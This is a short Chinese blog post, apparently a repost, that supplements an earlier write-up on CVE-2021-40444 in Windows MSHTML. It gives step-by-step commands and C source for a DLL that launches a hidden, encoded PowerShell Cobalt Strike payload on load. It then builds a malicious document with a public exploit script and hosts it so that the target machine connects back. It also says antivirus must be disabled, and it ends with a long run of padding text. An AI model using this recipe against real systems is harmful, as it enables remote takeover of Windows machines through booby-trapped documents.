上一篇的地址:
CVE-2021-40444 MSHTML组件漏洞|附:实现过程
以下是上一篇的一些补充
CS上线方法:
下载编译工具:
1sudo apt-get install gcc-mingw-w64
启动CS客户端和服务端,然后生成payload
1powershell -nop -w hidden -encodedcommand .....(忽略)
构造源文件
1#include <windows.h>
2
3void exec(void) {
4system("powershell -nop -w hidden -encodedcommand .....(忽略)");
5return;
6}
7
8BOOL WINAPI DllMain(
9 HINSTANCE hinstDLL,
10 DWORD fdwReason,
11 LPVOID lpReserved )
12{
13 switch( fdwReason )
14 {
15 case DLL_PROCESS_ATTACH:
16 exec();
17 break;
18
19 case DLL_THREAD_ATTACH:
20 break;
21
22 case DLL_THREAD_DETACH:
23 break;
24
25 case DLL_PROCESS_DETACH:
26 break;
27 }
28 return TRUE;
29}
编译生成生成dll
1i686-w64-mingw32-gcc -shared calc.c -o calc.dll
生成恶意文档
1python3 exploit.py generate test/calc.dll http://192.168.226.128
生产服务端
1sudo python3 exploit.py host 80
在虚拟机里打开生产的恶意文档 成功上线
复现注意事项
IE浏览器要启用ActiveX
注意防病毒要关闭
相关链接
https://xret2pwn.github.io/CVE-2021-40444-Analysis-and-Exploit/
https://github.com/rfcxv/CVE-2021-40444-POC
https://mp.weixin.qq.com/s/hjjLKQCiaVUKWOw1jzQE9A
凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数
文章来源: http://mp.weixin.qq.com/s?__biz=MzI0Nzc0NTcwOQ==&mid=2247485011&idx=1&sn=ce9b6a30fac3cab226d14fd42634811e&chksm=e9aa1b91dedd928704096e2ec63c5b0ced8c28b1a05a7a9a1874bf41b2484bfd5132ae6b0f99#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh